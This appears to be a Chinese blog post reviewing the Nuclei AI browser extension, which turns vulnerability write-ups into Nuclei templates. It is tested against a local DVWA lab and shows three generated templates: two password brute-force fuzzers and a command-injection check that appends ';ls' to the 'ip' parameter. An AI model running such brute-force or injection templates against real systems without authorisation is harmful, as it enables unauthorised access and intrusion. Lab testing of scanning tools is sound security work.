🍁 Nuclei 联动 AI , 自动化 POC & EXP 生成 🍁 Nuclei 官方开发的 利用 AI 生成 nuclei 模板的工具。Nuclei AI - 用于快速生成 Nuclei 模板的浏览器扩展,Nuclei AI Browser Extension建立在 cloud.project discovery .io 之上,使用户能够从任何网页中提取漏洞信息,快速有效地创建Nuclei模板,从而简化漏洞模板的创建,从而节省宝贵的时间和精力。 功能简介 HackerOne 报告到 nuclei 模板生成 ExploitDB 对 Nuclei 模板生成的漏洞利用 BugCrowd / Intigriti / Synack 支持(即将推出) 安装 https://github.com/projectdiscovery/nuclei-ai-extension/releases 下载压缩包 使用 要使用上下文菜单从任何网站上的选定文本生成细胞核模板: 右键单击以打开上下文菜单,然后选择“Generate Nuclei Template”选项。 AI 将根据所选文本生成一个 Nuclei 模板。 测试 测试一:DVWA 登陆界面测试生成 pass fuzz 模板
id: login-pass-fuzz-brute info: name: Login Password Fuzz Brute author: pdteam severity: info reference: http://127.0.0.1:4280/login.php http: - method: POST path: - "{{BaseURL}}/login.php" payloads: username: - admin password: - fuzz.txt attack: clusterbomb body: "username=§username§&password=§password§" matchers: - type: word words: - "Welcome Admin"
测试二:DVWA 第一关 Vulnerability: Brute Force ,模板如下
id: http-get-fuzzing-example info: name: HTTP GET Fuzzing Example author: pdteam severity: info reference: http://127.0.0.1:4280/vulnerabilities/brute/?username=admin&password=pass&Login=Login# http: - method: GET path: - "{{BaseURL}}?username=admin&password={{fuzz}}&Login=Login#" payloads: fuzz: - admin - pass - password matchers: - type: word words: - "Welcome Admin"
测试三:DVWA 第二关 Vulnerability: Command Injection 模板如下
id: command-injection-ls info: name: Command Injection ;ls author: pdteam severity: high reference: http://127.0.0.1:4280/vulnerabilities/exec/# http: - method: GET path: - "{{BaseURL}}/?ip=;ls" matchers: - type: word words: - "bin" - "boot" - "dev" - "etc" - "home" - "lib" - "opt" - "root" - "sbin" - "srv" - "tmp" - "usr" - "var" part: body
总结 Over .. .. . . . . . .. . ☺️
还没有评论,来说两句吧...